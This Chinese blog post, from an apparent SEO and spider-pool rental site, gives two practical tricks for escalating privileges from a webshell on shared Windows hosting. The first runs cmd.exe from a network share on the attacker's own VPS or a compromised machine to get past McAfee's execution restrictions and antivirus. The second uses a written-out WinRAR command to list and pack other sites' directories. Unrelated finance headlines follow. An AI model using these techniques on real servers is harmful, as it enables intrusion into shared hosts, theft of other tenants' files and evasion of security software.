网站地图 | RSS订阅 老铁博客 - 上海SEO优化|上海网站建设|蜘蛛池出租|站群代搭建
你的位置:首页 » 前端脚本 » 正文

关于虚拟主机提权的两个小技巧你了解吗?

2019-2-25 9:48:18 | 作者:老铁SEO | 0个评论 | 人浏览

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的"拒绝访问"?

原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。

下面是个人的小技巧:

0x01:是否大家会想到调用远程路径去执行CMD,比如(\\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:

1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将网络访问:本地帐户的共享和安全模型改为经典,所在共享目录程序给Everyone权限,如图:

虚拟主机提权

2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)

0x02:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,然后shell里面C:\progra~1\WinRAR\Rar.exea-k-r-s-m1c:\windows\temp\xx.rarE:\freehost\xxxasd5612asdfdsafsaf.jpg,这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。。

已有0位网友发表了一针见血的评论,你还等什么?

必填

选填

记住我,下次回复时不用重新输入个人信息

必填,不填不让过哦,嘻嘻。

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

福建阳光集团拟发3亿债券 上半年末有息负债超1335亿
陈一铭:元旦假期临近 警惕流动性风险
收评:北向资金流入44.28亿 30日净流入1107.64亿元
两名中国游客在菲律宾薄荷岛溺水身亡
贵州茅台股价逼近1200元 年内市值飙升超过7000亿
决策分析:美元一路杀跌 非美货币和黄金扶摇直上
创历史新高:年内18家上市公司退市 9家被强退
东方红品质优选定开发行:孔令超管偏债"基"年化6.14%
杨德龙:A股这轮慢牛长牛行情正渐入佳境
ST亚星拟购科源制药及宏济堂股份 或构成重组上市
,